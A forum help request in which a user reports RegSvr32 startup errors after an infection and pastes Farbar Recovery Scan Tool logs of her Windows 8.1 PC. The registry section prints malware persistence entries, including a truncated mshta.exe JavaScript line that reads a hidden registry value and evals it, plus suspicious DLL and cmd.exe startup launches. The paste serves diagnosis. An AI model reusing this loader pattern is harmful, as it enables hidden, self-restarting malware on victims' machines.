Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

RegSvr32 The module failed to load


  • Please log in to reply

#1
MelindavW

MelindavW

    New Member

  • Member
  • Pip
  • 3 posts

Hi

 

Recently my antivirus started blocking some infected files, which I subsequently deleted. Then I started receiving the RegSvr32 message upon startup.

I receive two of these errors

"C:\Users\Melinda\AppData\Local\lpl...\tvpgojdx.dll"

"C:\Users\Melinda\AppData\Local\Ek...\mpzrowjb.dll"

A window also pops up that says

Windows cannot find 'C:\Users\Melinda\AppData\Roaming\47ddd\fd6b5.65f2aa'. Make sure you typed the name correctly, and then try again.

 

I thought a system restore to factory setting would solve the problem, but it didn't.

 

Please help!

 

Please see below my FRST.txt and Addition.txt logs

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2016
Ran by Melinda (administrator) on MEL (06-07-2016 09:07:15)
Running from C:\Users\Melinda\Desktop
Loaded Profiles: Melinda (Available Profiles: Melinda & Administrator)
Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McA2BB0.tmp
(Microsoft) C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
() C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
() C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\toaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\dbrsync.exe
(Aviata Inc) C:\Program Files (x86)\Dell Product Registration\prodreg.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ModuleCore\ModuleCoreService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\CSP\1.9.741.0\McCSPServiceHost.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\mcafee\vul\McVulCtr.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McUICnt.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17477_none_fa2b7d3b9b36c7b4\TiWorker.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\vssx64.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-07-09] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1387736 2014-07-05] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [562264 2014-04-10] (Waves Audio Ltd.)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3777696 2014-01-17] (Dell Inc.)
HKLM-x32\...\Run: [DropboxOEM] => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [462160 2014-09-02] ()
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Microsoft system protection service] => rundll32.exe "C:\Users\Melinda\AppData\Local\Microsoft\Protect\protecthost.dll",DllInstall
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [**ucabwqcmu<*>] => "C:\Windows\system32\mshta.exe" javascript:UijM5="a9Z";s0c=new%20ActiveXObject("WScript.Shell");tgg8jMFW4="M7agQqde";nHzc77=s0c.RegRead("HKCU\\software\\fokfinshfo\\kblbsn");a43CaBx="1qdI";eval(nHzc77 (the data entry has 12 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [**niawqwmeni<*>] => "C:\Users\Melinda\AppData\Local\d6ab6\e9597.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Iplmsoft] => C:\Users\Melinda\AppData\Local\Iplmsoft\tmpDE80.exe
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [YjpwPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Melinda\AppData\Local\Iplmsoft\tvpgojdx.dll
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Ekbrtion] => regsvr32.exe C:\Users\Melinda\AppData\Local\Ekbrtion\mpzrowjb.dll <===== ATTENTION
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\MountPoints2: {05ce7cd0-584f-11e5-825e-acd1b8d216c6} - "F:\AutoRun.exe"
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\MountPoints2: {05ce7df2-584f-11e5-825e-acd1b8d216c6} - "F:\AutoRun.exe"
ShellIconOverlayIdentifiers: [DBRShellOverlayBackupFile] -> {831CEBDD-6BAF-4432-BE76-9E0989C14AEF} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconBackuped.dll [2015-12-08] (SoftThinks SAS)
ShellIconOverlayIdentifiers: [DBRShellOverlayModifiedBackupFile] -> {275E4FD7-21EF-45CF-A836-832E5D2CC1B3} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconNotBackuped.dll [2015-12-08] (SoftThinks SAS)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2015-06-07]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Melinda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9630a.lnk [2016-07-06]
ShortcutTarget: 9630a.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Melinda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f0f18.lnk [2016-06-30]
ShortcutTarget: f0f18.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{28CEFB91-FA63-4200-9B83-6978147A71A0}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{812A2ED5-72C3-4457-9E4D-A562956307C8}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001 -> {15187E60-21FC-4B6A-AF68-DCB76EE1584B} URL =
Toolbar: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-05-24] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-05-24] (McAfee, Inc.)

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin HKU\S-1-5-21-3305678368-1645044794-3837945535-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Melinda\AppData\Local\Citrix\Plugins\104\npappdetector.dll [No File]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 0106601467779372mcinstcleanup; C:\Windows\TEMP\010660~1.EXE [962400 2016-04-12] (McAfee, Inc.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-06-07] (Broadcom Corporation.)
R2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe [141704 2015-02-04] (Microsoft)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [119656 2016-01-15] (Dell)
S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [293440 2014-04-01] (Aviata, Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-01] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [989192 2016-05-24] (McAfee, Inc.)
R3 McAWFwk; c:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe [334608 2013-07-25] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\\McCSPServiceHost.exe [1903320 2016-04-18] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [795528 2016-04-20] (McAfee, Inc.)
S2 McOobeSv2; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-03-07] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-04-01] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-03-07] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1424352 2016-04-21] (McAfee, Inc.)
R2 My Dell Learning Center; C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe [22528 2015-01-22] () [File not signed]
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1029856 2016-04-21] (Intel Security, Inc.)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [253776 2013-07-30] (CyberLink)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2065808 2016-01-04] (SoftThinks SAS)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-06-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-06-07] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2015-06-07] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7569112 2015-06-07] (Broadcom Corporation)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-03-11] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-25] (OSR Open Systems Resources, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2016-03-11] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-03-11] (McAfee, Inc.)
U3 mfeavfk01; no ImagePath
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-03-11] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-03-11] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [842536 2016-03-11] (McAfee, Inc.)
U3 mfehidk01; no ImagePath
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
U3 mfencbdc01; no ImagePath
U3 mfencbdc02; no ImagePath
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243496 2016-03-11] (McAfee, Inc.)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [42664 2015-01-10] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-06-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-06-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-06-07] (Microsoft Corporation)
S0 mfeapfk; system32\drivers\mfeapfk.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-06 09:07 - 2016-07-06 09:08 - 00016725 _____ C:\Users\Melinda\Desktop\FRST.txt
2016-07-06 09:06 - 2016-07-06 09:07 - 00000000 ____D C:\FRST
2016-07-06 09:04 - 2016-07-06 09:05 - 02390016 _____ (Farbar) C:\Users\Melinda\Desktop\FRST64.exe
2016-07-06 08:20 - 2016-07-06 08:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-07-06 08:14 - 2016-07-06 08:14 - 00003068 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-07-06 08:14 - 2016-07-06 08:14 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-07-06 08:13 - 2016-07-06 08:13 - 00000000 ____D C:\ProgramData\Intel Security
2016-07-06 08:12 - 2016-07-06 08:12 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-07-06 08:07 - 2016-07-06 08:07 - 00003440 _____ C:\Windows\System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337
2016-07-06 07:58 - 2016-07-06 08:58 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-07-06 07:58 - 2016-07-06 07:58 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-06 07:57 - 2016-07-06 08:46 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3305678368-1645044794-3837945535-1001
2016-07-06 07:55 - 2016-07-06 07:55 - 00000000 ____D C:\Program Files (x86)\Dell Digital Delivery
2016-07-06 07:54 - 2016-07-06 07:54 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Macromedia
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieUserList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieSiteList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieBrowserModeList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\8c2cb
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 ____D C:\Users\Melinda\AppData\Local\fcb0a
2016-07-06 07:52 - 2016-07-06 08:02 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\DropboxOEM
2016-07-06 07:52 - 2016-07-06 07:52 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Adobe
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\Documents\Bluetooth Exchange Folder
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\DropboxOEM
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Broadcom
2016-07-06 06:43 - 2016-07-06 06:43 - 00000000 ____D C:\Users\Melinda\AppData\Local\Aviata
2016-07-06 06:37 - 2016-01-07 01:04 - 00000107 ____H C:\DBAR_Ver.txt
2016-07-06 06:34 - 2016-07-06 06:34 - 00003980 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003440 _____ C:\Windows\System32\Tasks\PCDEventLauncherTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003190 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2016-07-06 06:30 - 2016-07-06 06:30 - 00000000 ____D C:\Users\Melinda\AppData\Local\Power2Go8
2016-07-06 06:29 - 2016-07-06 06:29 - 00000144 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-07-06 06:29 - 2016-07-06 06:29 - 00000000 __SHD C:\Users\Melinda\IntelGraphicsProfiles
2016-07-06 06:28 - 2016-07-06 06:28 - 00000020 ___SH C:\Users\Melinda\ntuser.ini
2016-07-06 02:56 - 2016-07-06 06:37 - 00000000 ____D C:\ProgramData\softthinks
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\My Documents
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-07-05 19:48 - 2016-07-06 02:55 - 00000000 ____D C:\20160705194811_BACKUP

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-06 09:06 - 2015-06-07 15:13 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2016-07-06 09:06 - 2015-06-07 15:07 - 00000000 ____D C:\Program Files\Dell
2016-07-06 09:00 - 2015-06-07 15:19 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2016-07-06 09:00 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2016-07-06 08:59 - 2015-06-07 15:15 - 00000000 ____D C:\ProgramData\McAfee
2016-07-06 08:17 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files\Common Files\mcafee
2016-07-06 08:16 - 2013-08-22 17:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-07-06 08:16 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-07-06 08:08 - 2015-06-07 17:10 - 00000000 ____D C:\ProgramData\Dell
2016-07-06 07:52 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files (x86)\Dell Update
2016-07-06 07:51 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2016-07-06 06:40 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-07-06 06:34 - 2015-06-07 15:13 - 00000000 ____D C:\ProgramData\PCDr
2016-07-06 06:32 - 2014-11-21 06:42 - 00863592 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-06 06:29 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda
2016-07-06 06:28 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-06 02:50 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\Web
2016-07-05 09:51 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Packages

==================== Files in the root of some directories =======

2015-06-07 14:43 - 2015-06-07 14:43 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-06-07 15:02 - 2015-06-07 15:02 - 0000121 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log
2015-06-07 14:57 - 2015-06-07 14:58 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
2015-06-07 14:58 - 2015-06-07 15:00 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log
2015-06-07 15:00 - 2015-06-07 15:02 - 0000108 _____ () C:\ProgramData\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}.log
2015-06-07 14:56 - 2015-06-07 14:57 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-07-06 08:47

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by Melinda (2016-07-06 09:08:23)
Running from C:\Users\Melinda\Desktop
Windows 8.1 Single Language (Update) (X64) (2015-06-07 13:37:40)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3305678368-1645044794-3837945535-500 - Administrator - Disabled) => C:\Users\Administrator
Guest (S-1-5-21-3305678368-1645044794-3837945535-501 - Limited - Disabled)
Melinda (S-1-5-21-3305678368-1645044794-3837945535-1001 - Administrator - Enabled) => C:\Users\Melinda

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Amazon 1Button App (HKLM-x32\...\{0A7D6F3C-F2AB-48ED-BE23-99791BFF87D6}) (Version: 1.0.0.4 - Amazon) <==== ATTENTION
Amazon Kindle (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Amazon Kindle) (Version:  - Amazon)
